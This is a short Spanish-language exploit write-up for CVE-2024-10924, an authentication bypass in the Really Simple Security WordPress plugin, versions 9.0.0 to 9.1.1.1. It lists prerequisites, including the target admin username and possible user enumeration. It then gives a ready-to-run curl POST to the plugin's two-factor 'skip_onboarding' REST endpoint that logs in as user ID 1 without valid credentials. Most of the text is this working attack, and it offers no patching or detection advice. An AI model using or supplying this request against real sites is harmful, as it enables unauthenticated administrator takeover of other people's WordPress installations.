
CVE-2024-10924 es una vulnerabilidad crítica de omisión de autenticación en el plugin Really Simple Security para WordPress (versiones 9.0.0 a 9.1.1.1). Esta vulnerabilidad permite a atacantes no autenticados iniciar sesión como cualquier usuario (incluido el administrador) al explotar una falla en la API de autenticación de dos factores (2FA).
Un sitio de WordPress que ejecute una versión vulnerable del plugin Really Simple Security. Python 3.x o cURL instalado para las pruebas. El nombre de usuario administrador de WordPress objetivo (puede ser necesaria la enumeración de usuarios).
curl --request POST "http://{url}/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding" -H "Content-Type: application/json" -d '{"user_id": 1, "login_nonce": "invalid_nonce"}' -v